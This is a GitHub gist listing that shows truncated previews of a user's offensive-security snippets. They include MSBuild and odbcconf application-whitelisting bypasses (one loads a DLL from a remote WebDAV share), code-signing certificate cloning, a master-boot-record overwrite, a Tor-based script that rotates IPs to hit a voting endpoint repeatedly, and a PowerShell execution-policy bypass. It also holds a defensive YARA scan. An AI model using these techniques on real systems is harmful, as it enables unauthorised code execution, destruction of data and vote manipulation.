Dan Borges ahhh

👾

danger code

ahhh / msbuild.xml

Created December 26, 2017 17:09 — forked from Arno0x/msbuild.xml

MSBuild project definition to execute arbitrary code from msbuild.exe

	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
	<!-- This inline task executes c# code. -->
	<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml -->
	<Target Name="Hello">
	<SharpLauncher >
	</SharpLauncher>
	</Target>
	<UsingTask
	TaskName="SharpLauncher"
	TaskFactory="CodeTaskFactory"

ahhh / odbcconf.cs

Created December 26, 2017 17:09 — forked from Arno0x/odbcconf.cs

Download and execute arbitrary code with odbcconf.exe

	/*
	To use with odbcconf.exe:

	odbcconf /S /A {REGSVR odbcconf.dll}

	or, from a remote location (if WebDAV support enabled):
	odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll}
	*/

	using System;

ahhh / Cert-Clone.ps1

Last active March 23, 2023 20:22

	# Technique taken from: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
	# Remeber to set your target file path to $SignThis!!
	# Example: $SignThis = "C:\Users\user\Desktop\runme.exe"; Cert-Clone.ps1;

	# Setup Cert Store in Reg
	$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
	# Setup Cert Store on Disk
	[system.io.directory]::CreateDirectory("C:\CertStore")

	# Download Root Cert

ahhh / keybase.md

Created October 27, 2017 19:53

keybase.md

I hereby claim:

I am ahhh on github.
I am ahhh (https://keybase.io/ahhh) on keybase.
I have a public key whose fingerprint is 9DAC 1893 691E 8213 7040 FBCB 542C 4EE7 1926 BAE2

To claim this, I am signing this object:

ahhh / Get-ScreenShot.ps1

Last active November 1, 2016 20:11 — forked from guitarrapc/Get-ScreenShot.ps1

Screenshot Automation with PowerShell

	function Get-ScreenShot
	{
	[CmdletBinding()]
	param(
	[parameter(Mandatory = 0)]
	[ValidateNotNullOrEmpty()]
	[Alias('Path', 'Out', 'o')]
	[string]$OutPath = "$env:USERPROFILE\Documents\ScreenShot",

	#screenshot_[yyyyMMdd_HHmmss_ffff].png

ahhh / stomp-mbr.ps1

Last active December 23, 2020 07:28

	function Set-MasterBootRecord
	{
	<#
	.SYNOPSIS
	Proof of concept code that overwrites the master boot record with the
	message of your choice.
	PowerSploit Function: Set-MasterBootRecord
	Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
	Adopted by: Ahhh (for CCDC)
	License: BSD 3-Clause

ahhh / SirVotesAlot.sh

Created February 17, 2016 23:06

shell script for getting new IPs through TOR and hitting an endpoint with these IPs

	#!/bin/bash

	votecounter=0
	derp="init_value"
	count=0

	while true; do

	derp=$"init_value"
	derp=$(curl -s --socks5-hostname localhost:9050 http://www.imdb.com/name/nm0000206/ \| grep -o "Keanu Reeves")

ahhh / Enable_Scripting.ps1

Created February 16, 2016 05:38

Enable running any PowerShell scripts, normally / default they are restricted

	#powershell -ExecutionPolicy ByPass -File ./example.ps1
	Set-ExecutionPolicy Unrestricted

ahhh / yara_scan.ps1

Created February 15, 2016 23:44

a quick yara scanning routine, pulled from: https://www.bsk-consulting.de/2014/08/28/scan-system-files-manipulations-yara-inverse-matching-22/

	Get-ChildItem -Recurse -filter *.exe C:\Windows\ 2> $null \|
	ForEach-Object { Write-Host -foregroundcolor "green" "Scanning"$_.FullName $_.Name; ./yara32.exe -d filename=$_.Name your_rule.yar $_.FullName 2> $null }

ahhh / cve_2016_0728.c

Created January 19, 2016 18:22 — forked from PerceptionPointTeam/cve_2016_0728.c

cve_2016_0728 exploit